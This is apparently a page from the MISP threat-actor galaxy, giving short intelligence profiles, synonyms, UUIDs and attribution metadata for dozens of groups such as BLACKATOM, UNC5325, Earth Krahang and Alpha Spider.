Recent campaigns suggest Hamas-linked actors may be advancing their TTPs to include intricate social engineering lures specially crafted to appeal to a niche group of high value targets. In September 2023, a Palestine-based group likely linked to Hamas targeted Israeli software engineers using an elaborate social engineering ruse that ultimately installed malware and stole cookies. The attackers, which Google’s Threat Analysis Group (TAG) tracks as BLACKATOM, posed as employees of legitimate companies and reached out via LinkedIn to invite targets to apply for software development freelance opportunities. Targets included software engineers in the Israeli military, as well as Israel’s aerospace and defense industry
Internal MISP references
UUID 264687b8-82f4-43b5-b7bb-dc3e0b9246bc
which can be used as unique global reference for Blackatom
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Palestine |
cfr-suspected-victims | ['Israel'] |
cfr-target-category | ['Military', 'Defense', 'Transportation'] |
cfr-type-of-incident | Espionage |
country | PS |
BANISHED KITTEN
BANISHED KITTEN is an Iranian state-nexus adversary active since at least 2008. While the adversary’s most prominent activity is the July and September 2022 disruptive attacks targeting Albanian government infrastructure and the use of the HomelandJustice persona to leak stolen data, BANISHED KITTEN has likely targeted dissidents using the AllinOneNeo malware family.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BANISHED KITTEN.
Known Synonyms |
---|
DUNE |
Storm-0842 |
Internal MISP references
UUID 3682a08e-c1d9-4dff-ae08-774883dddba6
which can be used as unique global reference for BANISHED KITTEN
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['United States', 'Israel', 'Middle East', 'Europe'] |
cfr-target-category | ['Government', 'Healthcare', 'Pharmaceuticals', 'High-Tech', 'Telecomms', 'Education', 'Media', 'NGOs', 'Civil Society'] |
cfr-type-of-incident | ['Espionage', 'Information Operations', 'Sabotage'] |
country | IR |
ProCC
ProCC is a threat actor targeting the hospitality sector with remote access Trojan malware. They use email attachments to exploit vulnerabilities like CVE-2017-0199 and deploy customized versions of RATs such as RevengeRAT, NjRAT, NanoCoreRAT, and 888 RAT. ProCC's malware is capable of collecting data from the clipboard and printer spooler, as well as capturing screenshots on infected machines.
Internal MISP references
UUID c74f78d1-3728-4bb9-b84f-0e46d2e870b2
which can be used as unique global reference for ProCC
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
ResumeLooters
Since the beginning of 2023, ResumeLooters have been able to compromise at least 65 websites. The group employs a variety of simple techniques, including SQL injection and XSS. The threat actor attempted to insert XSS scripts into all available forms, aiming to execute it on the administrators’ device to obtain admin credentials. While the group was able to execute the XSS script on some visitors’ devices with administrative access, allowing ResumeLooters to steal the HTML code of the pages the victims were visiting, Group-IB did not find any confirmation of admin credential thefts.
Internal MISP references
UUID 76dbe26b-8b39-40f5-bc2b-9620004f388e
which can be used as unique global reference for ResumeLooters
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
ShadowSyndicate
ShadowSyndicate is a threat actor associated with various ransomware groups, using a consistent Secure Shell fingerprint across multiple servers. They have been linked to ransomware families such as Quantum, Nokoyawa, and ALPHV. ShadowSyndicate's infrastructure overlaps with that of Cl0p, suggesting potential connections between the two groups. Their activities indicate they may be a Ransomware-as-a-Service affiliate.
Internal MISP references
UUID 24a7e1eb-b7c7-486b-96b2-8d313d65bf70
which can be used as unique global reference for ShadowSyndicate
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
LabHost
LabHost is a threat actor group targeting Canadian Banks with Phishing-as-a-Service attacks. They have been observed using tools like LabRat and LabSend for real-time campaign management and SMS lures. LabHost's phishing campaigns have similarities to Frappo campaigns, but they operate separately and offer different subscription packages.
Internal MISP references
UUID 583cdea6-1d72-44d4-824f-f965e8a23f3e
which can be used as unique global reference for LabHost
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Cyber.Anarchy.Squad
Cyber Anarchy Squad is a pro-Ukrainian hacktivist group known for targeting Russian companies and infrastructure. They have carried out cyberattacks on Russian telecom providers, financial institutions, and government agencies, causing disruptions to services and leaking stolen data. The group has used techniques such as wiping network equipment, defacing websites, and leaking sensitive documents to support their cause. Cyber Anarchy Squad has been active for at least four years, evolving from cyber-bullying to more sophisticated hacking activities.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cyber.Anarchy.Squad.
Known Synonyms |
---|
Cyber Anarchy Squad |
Internal MISP references
UUID 264d9a4b-9b0b-416f-9b09-819e96967a30
which can be used as unique global reference for Cyber.Anarchy.Squad
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | UA |
GoldFactory
GoldFactory is a threat actor group attributed to developing sophisticated mobile banking malware targeting victims primarily in the Asia-Pacific region, specifically Vietnam and Thailand. They utilize social engineering to deliver malware to victims' devices and have close connections to the Gigabud malware family. GoldFactory's Trojans, such as GoldPickaxe and GoldDigger, employ tactics like smishing, phishing, and fake login screens to compromise victims' phones and steal sensitive information. Their evolving malware suite demonstrates a high level of operational maturity and ingenuity, requiring a proactive and multi-faceted cybersecurity approach to detect and mitigate their threats.
Internal MISP references
UUID 74268518-8dd9-4223-9f7f-54421463cdb3
which can be used as unique global reference for GoldFactory
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
SPIKEDWINE
SPIKEDWINE is a threat actor targeting European officials with a new backdoor called WINELOADER. They use a bait PDF document posing as an invitation letter from the Ambassador of India to lure diplomats. The attack is characterized by advanced tactics, techniques, and procedures in the malware and command and control infrastructure. The motivation behind the attacks seems to be exploiting the geopolitical relations between India and European nations.
Internal MISP references
UUID d3cda6b1-a5da-4afc-bee4-80ea2cf05e5e
which can be used as unique global reference for SPIKEDWINE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
UAC-0184
UAC-0184 is a threat actor targeting Ukrainian organizations in Finland, using the Remcos Remote Access Trojan in their attacks. They have been observed utilizing steganographic image files and the IDAT Loader to deliver the malware. The group has targeted the Armed Forces of Ukraine and impersonated military recruitment processes to infect systems with the Remcos RAT.
Internal MISP references
UUID 0e3224a0-3544-47d7-b1ce-fb3eb21286ad
which can be used as unique global reference for UAC-0184
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
UNC1549
UNC1549 is an Iranian threat actor linked to Tortoiseshell and potentially the IRGC. They have been active since at least June 2022, targeting entities worldwide with a focus on the Middle East. UNC1549 uses spear-phishing and credential harvesting for initial access, deploying custom malware like MINIBIKE and MINIBUS backdoors. They have also been observed using evasion techniques and a tunneler named LIGHTRAIL in their operations.
Internal MISP references
UUID a2a7d49f-f517-4eeb-9ec8-b9b74e3fe756
which can be used as unique global reference for UNC1549
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Mogilevich
Mogilevich is a ransomware group known for claiming to breach organizations like Epic Games and Ireland's Department of Foreign Affairs, offering stolen data for sale without providing proof of the attacks. They operate as an extortion group, targeting high-profile victims and demanding payment for the data they claim to have stolen. Despite their claims, security researchers have noted that Mogilevich's tactics and website design suggest they may not be a sophisticated threat actor.
Internal MISP references
UUID 95634994-9604-4fe6-9462-f472c2d82271
which can be used as unique global reference for Mogilevich
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
R00tK1T
R00TK1T is a hacking group known for sophisticated cyber attacks targeting governmental agencies in Malaysia, including data exfiltration from the National Population and Family Development Board. The group has publicized their successful attacks on social media, showcasing stolen data. R00TK1T has also targeted Malaysian telecom providers, defacing portals and potentially breaching user data.
Internal MISP references
UUID 69a944ef-4962-432e-a1b9-575b646ee2ed
which can be used as unique global reference for R00tK1T
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IL |
UNC5325
UNC5325 is a suspected Chinese cyber espionage operator that exploited CVE-2024-21893 to compromise Ivanti Connect Secure appliances. UNC5325 leveraged code from open-source projects, installed custom malware, and modified the appliance's settings in order to evade detection and attempt to maintain persistence. UNC5325 has been observed deploying LITTLELAMB.WOOLTEA, PITSTOP, PITDOG, PITJET, and PITHOOK. Mandiant identified TTPs and malware code overlaps in LITTLELAMB.WOOLTEA and PITHOOK with malware leveraged by UNC3886. Mandiant assesses with moderate confidence that UNC5325 is associated with UNC3886.
Internal MISP references
UUID ffb28c09-16a6-483a-817a-89c89751c9d4
which can be used as unique global reference for UNC5325
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Earth Kapre
Earth Kapre is an APT group specializing in cyberespionage. They target organizations in various countries through phishing campaigns using malicious attachments to infect machines. Earth Kapre employs techniques like abusing PowerShell, curl, and Program Compatibility Assistant to execute malicious commands and evade detection within targeted networks. The group has been active since at least 2018 and has been linked to multiple incidents involving data theft and espionage.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Earth Kapre.
Known Synonyms |
---|
Red Wolf |
RedCurl |
Internal MISP references
UUID d4004926-bf12-4cfe-b141-563c8ffb304a
which can be used as unique global reference for Earth Kapre
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Earth Krahang
Earth Krahang is an APT group targeting government organizations worldwide. They use spear-phishing emails, weak internet-facing servers, and custom backdoors like Cobalt Strike, RESHELL, and XDealer to conduct cyber espionage. The group creates VPN servers on infected systems, employs brute force attacks on email accounts, and exploits compromised government infrastructure to attack other governments. Earth Krahang has been linked to another China-linked actor, Earth Lusca, and is believed to be part of a specialized task force for cyber espionage against government institutions.
Internal MISP references
UUID 8cfc9653-51bc-40f1-a267-78a1b8c763f6
which can be used as unique global reference for Earth Krahang
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Mirage Tiger
Internal MISP references
UUID da89d534-5be8-414b-832c-3e9d0d66b4e0
which can be used as unique global reference for Mirage Tiger
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Germany'] |
SilitNetwork
SilitNetwork is a hacking group known for targeting high-profile entities, such as airlines, for various motives. They utilize sophisticated tactics to breach their targets, potentially including social engineering and exploiting software vulnerabilities. The group's attack on RwandAir highlighted the vulnerability of the aviation industry and the need for robust cybersecurity measures.
Internal MISP references
UUID a0b92be9-7b62-47df-a2e8-16211c864599
which can be used as unique global reference for SilitNetwork
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Edalat-e Ali
Edalat-e Ali is a hacktivist group known for disrupting Iranian state-run TV and radio transmissions during significant events, such as the Revolution Day ceremonies. They have also targeted government facilities, releasing security camera footage to expose abuses and draw attention to human rights violations. The group has used their hacks to call for protests against the Iranian regime and have displayed anti-government messages during their disruptions. Edalat-e Ali has been active in releasing sensitive information and footage to embarrass Iranian officials and highlight injustices within the country.
Internal MISP references
UUID 1759f8f2-e6ef-4683-a9e4-44984b9deaba
which can be used as unique global reference for Edalat-e Ali
in MISP communities and other software using the MISP galaxy
External references
- https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/ - webarchive
- https://securityaffairs.com/142172/hacktivism/iranian-state-tv-hacked.html - webarchive
- https://www.chronline.com/stories/a-hacking-slugfest-between-iran-and-its-foes-sparks-fears-of-a-wider-cyberwar,281423 - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Saad Tycoon
Saad Tycoon is the operator and alleged developer of the Tycoon 2FA PhaaS, a phishing service that targets users for financial gain. The actor utilizes Bitcoin transactions to generate significant profits from the fraudulent service. The phishing infrastructure includes domain registration, server hosting, and possibly Cloudflare protection.
Internal MISP references
UUID d9709373-7a3a-4905-8c90-ba74237e77ea
which can be used as unique global reference for Saad Tycoon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
UNC5174
UNC5174, a Chinese state-sponsored threat actor, has been identified by Mandiant for exploiting critical vulnerabilities in F5 BIG-IP and ScreenConnect. They have been linked to targeting research and education institutions, businesses, charities, NGOs, and government organizations in Southeast Asia, the U.S., and the UK. UNC5174 is believed to have connections to China's Ministry of State Security and has been observed using custom tooling and the SUPERSHELL framework in their operations. The actor has shown indications of transitioning from hacktivist collectives to working as a contractor for Chinese intelligence agencies.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular UNC5174.
Known Synonyms |
---|
Uteus |
Internal MISP references
UUID 0b158297-ee47-48ef-9346-0cb0f9cb348a
which can be used as unique global reference for UNC5174
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
CyberNiggers
CyberNiggers is a threat group known for breaching various organizations, including the US military, federal contractors, and multinational corporations like General Electric. Led by the prominent member IntelBroker, they specialize in selling access to compromised systems and stealing sensitive data, such as military files and personally identifiable information. The group has targeted a diverse portfolio of organizations, showcasing their strategic approach to gathering varied sets of information. Their activities raise concerns about national security, individual privacy, and the need for robust cybersecurity measures to mitigate the impact of cyber adversaries.
Internal MISP references
UUID 21ad5aad-0a55-457d-b94d-3b4565e82e0a
which can be used as unique global reference for CyberNiggers
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Bignosa
Bignosa is a threat actor known for launching malware campaigns targeting Australian and US organizations using phishing emails with disguised Agent Tesla attachments protected by Cassandra Protector. They compromised servers by installing Plesk and RoundCube, connected via SSH and RDP, and used advanced obfuscation methods to evade detection. Bignosa collaborated with another cybercriminal named Gods, who provided advice and assistance in their malicious activities. The actor has been linked to multiple phishing attacks and malware distribution campaigns, showcasing a high level of sophistication in their operations.
Internal MISP references
UUID 07232925-bd1b-49a9-adca-46536ff6fdd8
which can be used as unique global reference for Bignosa
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | KE |
Smishing Triad
The Smishing Triad is a Chinese-speaking threat group known for targeting postal services and their customers globally through smishing campaigns. They leverage compromised Apple iMessage accounts to send fraudulent messages warning of undeliverable packages, aiming to collect personally identifying information and payment credentials. The group offers smishing kits for sale on platforms like Telegram, enabling other cybercriminals to launch independent attacks. "Smishing Triad" has expanded its operations to target UAE citizens, using geo-filtering to focus on victims in the Emirates.
Internal MISP references
UUID 85db04b5-1ec2-4e25-908a-f53576bd175a
which can be used as unique global reference for Smishing Triad
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
BlackJack
Blackjack, a threat actor linked to Ukraine's security apparatus, has targeted critical Russian entities such as ISPs, utilities, and military infrastructure. They have claimed responsibility for launching cyberattacks resulting in substantial damage and data exfiltration. The group allegedly used the Fuxnet malware to target sensor gateways connected to internet-connected sensors, impacting infrastructure monitoring systems. Blackjack has also been involved in attacks against companies like Moscollector, causing disruptions and stealing sensitive data.
Internal MISP references
UUID a5aa9b72-2bfb-427c-97fc-6ec04357233b
which can be used as unique global reference for BlackJack
in MISP communities and other software using the MISP galaxy
External references
- https://www.enigmasoftware.com/fuxneticsmalware-removal/ - webarchive
- https://www.securityweek.com/destructive-ics-malware-fuxnet-used-by-ukraine-against-russian-infrastructure/ - webarchive
- https://claroty.com/team82/research/unpacking-the-blackjack-groups-fuxnet-malware - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-update-pro-ukraine-hacktivists-breach-russian-isp-as-revenge-for-kyivstar-attack/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | UA |
CoralRaider
CoralRaider is a financially motivated threat actor of Vietnamese origin, targeting victims in Asian and Southeast Asian countries since at least 2023. They use the RotBot loader family and XClient stealer to steal victim information, with hardcoded Vietnamese words in their payloads. CoralRaider operates from Hanoi, Vietnam, and uses a Telegram bot as a C2 channel for their malicious campaigns. Their activities include system reconnaissance, data exfiltration, and targeting victims in multiple countries in the region.
Internal MISP references
UUID 20927a3f-d011-4e22-8268-0938d6816a13
which can be used as unique global reference for CoralRaider
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | VN |
RUBYCARP
RUBYCARP is a financially-motivated threat actor group likely based in Romania, with a history of at least 10 years of activity. They operate a botnet using public exploits and brute force attacks, communicating via public and private IRC networks. RUBYCARP targets vulnerabilities in frameworks like Laravel and WordPress, as well as conducting phishing operations to steal financial assets. They use a variety of tools, including the Perl Shellbot, for post-exploitation activities and have a diverse set of illicit income streams.
Internal MISP references
UUID 2742b229-02f4-40d0-9b99-91844a2b030e
which can be used as unique global reference for RUBYCARP
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RO |
Starry Addax
Starry Addax is a threat actor targeting human rights activists associated with the Sahrawi Arab Democratic Republic using a novel mobile malware called FlexStarling. They conduct phishing attacks to trick targets into installing malicious Android applications and serve credential-harvesting pages to Windows-based targets. Their infrastructure targets both Windows and Android users, with the campaign starting with spear-phishing emails containing requests to install specific mobile apps or related themes. The campaign is in its early stages, with potential for additional malware variants and infrastructure development.
Internal MISP references
UUID 579fde0d-0840-4e49-ad62-405ce338f5a6
which can be used as unique global reference for Starry Addax
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Cyber Army of Russia Reborn
Internal MISP references
UUID e496af6a-1f1b-47fd-b908-fc369e32ffba
which can be used as unique global reference for Cyber Army of Russia Reborn
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
People's Cyber Army of Russia
Internal MISP references
UUID ceee219c-8af2-4cea-8382-6ef6c311eac8
which can be used as unique global reference for People's Cyber Army of Russia
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
RGB-TEAM
RGB-TEAM is a previously unknown Russian-speaking threat actor. They describe themselves as “a community of anonymous hacktivists fighting for freedom.” The group stated that it doesn’t have enemies in the U.S., Europe, “in the East, or in the West.”
Internal MISP references
UUID 9b670978-f346-48dc-a292-7ae05b6f90a0
which can be used as unique global reference for RGB-TEAM
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Russia'] |
UNC5266
Mandiant created UNC5266 to track post-disclosure exploitation leading to deployment of Bishop Fox's SLIVER implant framework, a WARPWIRE variant, and a new malware family that Mandiant has named TERRIBLETEA. At this time, based on observed infrastructure usage similarities, Mandiant suspects with moderate confidence that UNC5266 overlaps in part with UNC3569, a China-nexus espionage actor that has been observed exploiting vulnerabilities in Aspera Faspex, Microsoft Exchange, and Oracle Web Applications Desktop Integrator, among others, to gain initial access to target environments.
Internal MISP references
UUID 083a637b-c58c-4ccb-ab59-81d783873e80
which can be used as unique global reference for UNC5266
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
UNC5330
UNC5330 is a suspected China-nexus espionage actor. UNC5330 has been observed chaining CVE-2024-21893 and CVE-2024-21887 to compromise Ivanti Connect Secure VPN appliances as early as Feb. 2024. Post-compromise activity by UNC5330 includes deployment of PHANTOMNET and TONERJAM. UNC5330 has employed Windows Management Instrumentation (WMI) to perform reconnaissance, move laterally, manipulate registry entries, and establish persistence. Mandiant observed UNC5330 operating a server since Dec. 6, 2021, which the group used as a GOST proxy to help facilitate malicious tool deployment to endpoints. The default certificate for GOST proxy was observed from Sept. 1, 2022 through Jan. 1, 2024. UNC5330 also attempted to download Fast Reverse Proxy (FRP) from this server on Feb. 3, 2024, from a compromised Ivanti Connect Secure device. Given the SSH key reuse in conjunction with the temporal proximity of these events, Mandiant assesses with moderate confidence UNC5330 has been operating through this server since at least 2021.
Internal MISP references
UUID c5ea778c-df2f-4c63-b401-dded9cb2419c
which can be used as unique global reference for UNC5330
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Related clusters
To see the related clusters, click here.
UNC5337
UNC5337 is a suspected China-nexus espionage actor that compromised Ivanti Connect Secure VPN appliances as early as Jan. 2024. UNC5337 is suspected to exploit CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection) for infecting Ivanti Connect Secure appliances. UNC5337 leveraged multiple custom malware families including the SPAWNSNAIL passive backdoor, SPAWNMOLE tunneler, SPAWNANT installer, and SPAWNSLOTH log tampering utility. Mandiant suspects with medium confidence that UNC5337 is UNC5221.
Internal MISP references
UUID 6fcf8d1f-2e68-4982-a579-2ca5595e4990
which can be used as unique global reference for UNC5337
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Related clusters
To see the related clusters, click here.
UNC5291
UNC5291 is a cluster of targeted probing activity that we assess with moderate confidence is associated with UNC3236, also known publicly as Volt Typhoon. Activity for this cluster started in December 2023 focusing on Citrix Netscaler ADC and then shifted to focus on Ivanti Connect Secure devices after details were made public in mid-Jan. 2024. Probing has been observed against the academic, energy, defense, and health sectors, which aligns with past Volt Typhoon interest in critical infrastructure. In Feb. 2024, the Cybersecurity and Infrastructure Security Agency (CISA) released an advisory warning that Volt Typhoon was targeting critical infrastructure and was potentially interested in Ivanti Connect Secure devices for initial access.
Internal MISP references
UUID b2535333-629d-4cd6-a98b-14c86f6a57ee
which can be used as unique global reference for UNC5291
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
UNC3569
China-nexus espionage actor that has been observed exploiting vulnerabilities in Aspera Faspex, Microsoft Exchange, and Oracle Web Applications Desktop Integrator, among others, to gain initial access to target environments.
Internal MISP references
UUID dd0063e0-2d44-4798-9e6d-ef0eaa2c2508
which can be used as unique global reference for UNC3569
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Earth Freybug
Earth Freybug, identified as a subset of APT41, is a cyberthreat group active since at least 2012, engaging in espionage and financially motivated activities across various sectors worldwide. The tactics, techniques, and procedures (TTPs) used in this campaign are similar to the ones from a campaign (Operation CuckooBees) described in an article published by Cybereason. They employ a diverse toolkit, including LOLBins and custom malware, to execute sophisticated cyberespionage attacks. The group's recent tactics involve DLL hijacking and API unhooking through a newly discovered malware named UNAPIMON, which prevents child processes from being monitored. This technique was observed in a vmtoolsd.exe process creating remote tasks to deploy malicious batch files for reconnaissance and backdoor access. UNAPIMON's simplicity and use of Microsoft Detours for defense evasion highlight the group's evolving methods and the need for vigilant security measures, such as restricting admin privileges and adhering to the principle of least privilege. Earth Freybug's persistence and creativity in refining their techniques underscore the ongoing threat they pose and the importance of proactive cybersecurity practices.
Internal MISP references
UUID c6e2e5ba-ffad-4258-8b6e-775b3fa230c3
which can be used as unique global reference for Earth Freybug
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
GhostR
Ghostr is a financially motivated threat actor known for stealing a confidential database containing 5.3 million records from the World-Check and leaking about 186GB of data from a stock trading platform. They have been active on Breachforums.is, revealing massive data breaches involving comprehensive details of Thai users, including full names, phone numbers, email addresses, and ID card numbers.
Internal MISP references
UUID 0e4ed0ab-87e2-4588-8fc0-3d720e0efebd
which can be used as unique global reference for GhostR
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
UTA0218
UTA0218 is a threat actor with advanced capabilities, targeting organizations to establish a reverse shell, acquire tools, and extract data. They exploit vulnerabilities in firewall devices to move laterally within victim networks, focusing on obtaining domain backup keys and active directory credentials. The actor deploys a custom Python backdoor named UPSTYLE to execute commands and download additional tools. UTA0218 is likely state-backed, utilizing a mix of infrastructure including VPNs and compromised routers to store malicious files.
Internal MISP references
UUID ee8b8fc4-59f4-4442-a4e6-3686d09c6509
which can be used as unique global reference for UTA0218
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
UAC-0149
UAC-0149 is a threat actor targeting the Armed Forces of Ukraine with COOKBOX malware. They use obfuscation techniques like character encoding and base64 encoding to evade detection. The group leverages dynamic DNS services and Cloudflare Workers for their C2 infrastructure.
Internal MISP references
UUID f5f6d4eb-1ec3-494e-807d-5b767122f9b2
which can be used as unique global reference for UAC-0149
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
ArcaneDoor
ArcaneDoor is a campaign that is the latest example of state-sponsored actors targeting perimeter network devices from multiple vendors. Coveted by these actors, perimeter network devices are the perfect intrusion point for espionage-focused campaigns. As a critical path for data into and out of the network, these devices need to be routinely and promptly patched; using up-to-date hardware and software versions and configurations; and be closely monitored from a security perspective. Gaining a foothold on these devices allows an actor to directly pivot into an organization, reroute or modify traffic and monitor network communications. In the past two years, we have seen a dramatic and sustained increase in the targeting of these devices in areas such as telecommunications providers and energy sector organizations — critical infrastructure entities that are likely strategic targets of interest for many foreign governments.
Internal MISP references
UUID 97a10d3b-5cb5-4df9-856c-515994f3e953
which can be used as unique global reference for ArcaneDoor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Storm-1849
UAT4356 is a state-sponsored threat actor that targeted government networks globally through a campaign named ArcaneDoor. They exploited two zero-day vulnerabilities in Cisco Adaptive Security Appliances to deploy custom malware implants called "Line Runner" and "Line Dancer." The actor demonstrated a deep understanding of Cisco systems, utilized anti-forensic measures, and took deliberate steps to evade detection. UAT4356's sophisticated attack chain allowed them to conduct malicious actions such as configuration modification, reconnaissance, network traffic capture/exfiltration, and potentially lateral movement on compromised devices.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Storm-1849.
Known Synonyms |
---|
UAT4356 |
Internal MISP references
UUID 3d94ef07-9fd6-4d64-bf1e-f1316f2686a4
which can be used as unique global reference for Storm-1849
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
USDoD
USDoD is a threat actor known for leaking large databases of personal information, including from companies like Airbus and the U.S. Environmental Protection Agency. They have a history of engaging in high-profile data breaches, such as exposing data from the FBI's InfraGard program. USDoD has also been involved in web scraping to obtain information from websites like LinkedIn.
Internal MISP references
UUID d6882fb9-d1e4-4cec-889c-5423c772d199
which can be used as unique global reference for USDoD
in MISP communities and other software using the MISP galaxy
External references
- https://www.hackread.com/us-environmental-protection-agency-hacked-data-leaked/ - webarchive
- https://www.cysecurity.news/2023/09/transunion-refutes-data-breach-reports.html - webarchive
- https://socradar.io/unmasking-usdod-the-enigma-of-the-cyber-realm/ - webarchive
- https://krebsonsecurity.com/2023/09/fbi-hacker-dropped-stolen-airbus-data-on-9-11/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Water Orthrus
Water Orthrus is a threat actor known for distributing CopperStealer and CopperPhish malware. They target Microsoft 365 users with phishing campaigns to steal credit card information. The actor has evolved their malware to include rootkits for stealthy installations and has shifted their focus from personal information to cryptocurrency and credit card data. Water Orthrus has been linked to the Scranos campaign reported in 2019.
Internal MISP references
UUID 19ddf2b0-9cfb-430f-8919-49205cbec863
which can be used as unique global reference for Water Orthrus
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
PhantomCore
PhantomCore is a threat actor group known for using a remote access malware called PhantomRAT. They have been observed executing malicious code through specially crafted RAR archives, different from previous attacks exploiting vulnerabilities. The attribution of their campaign to Ukraine is uncertain due to limited visibility inside Russian networks. PhantomCore's use of RAR archives in their attack chain has been previously observed in other threat actor groups like Forest Blizzard.
Internal MISP references
UUID 485947c7-edb6-4a07-9276-2114dc767551
which can be used as unique global reference for PhantomCore
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
CiberInteligenciaSV
CiberInteligenciaSV is a threat actor that leaked 5.1 million Salvadoran records on Breach Forums. They have also compromised El Salvador's state Bitcoin wallet, Chivo, leaking its source code and VPN credentials. The group aims to obscure their involvement by associating with the Guacamaya group and its proxies.
Internal MISP references
UUID 0558bc64-21d9-43e4-8b12-18172d9b5c7d
which can be used as unique global reference for CiberInteligenciaSV
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Void Manticore
Void Manticore is an Iranian APT group affiliated with MOIS, known for conducting destructive wiping attacks and influence operations. They collaborate with Scarred Manticore, sharing targets and conducting disruptive operations using custom wipers. Void Manticore's TTPs involve manual file deletion, lateral movement via RDP, and the deployment of custom wipers like the BiBi wiper. The group utilizes online personas like 'Karma' and 'Homeland Justice' to leak information and amplify the impact of their attacks.
Internal MISP references
UUID 53ac2695-35ba-4ab2-a5cd-48ca533f1b72
which can be used as unique global reference for Void Manticore
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Alpha Spider
ALPHA SPIDER is a threat actor known for developing and operating the Alphv ransomware as a service. They have been observed using novel offensive techniques, such as exploiting software vulnerabilities and leveraging legitimate administration tools for malicious activities. ALPHA SPIDER affiliates have demonstrated persistence in exfiltrating data and have shown the ability to bypass security measures like DNS-based filtering and multifactor authentication. Despite lacking specific operational security measures, defenders have opportunities to detect and respond to ALPHA SPIDER's operations effectively.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Alpha Spider.
Known Synonyms |
---|
ALPHV Ransomware Group |
Internal MISP references
UUID 6149f3b6-510d-4e45-bf88-cd25c7193702
which can be used as unique global reference for Alpha Spider
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
RansomHub
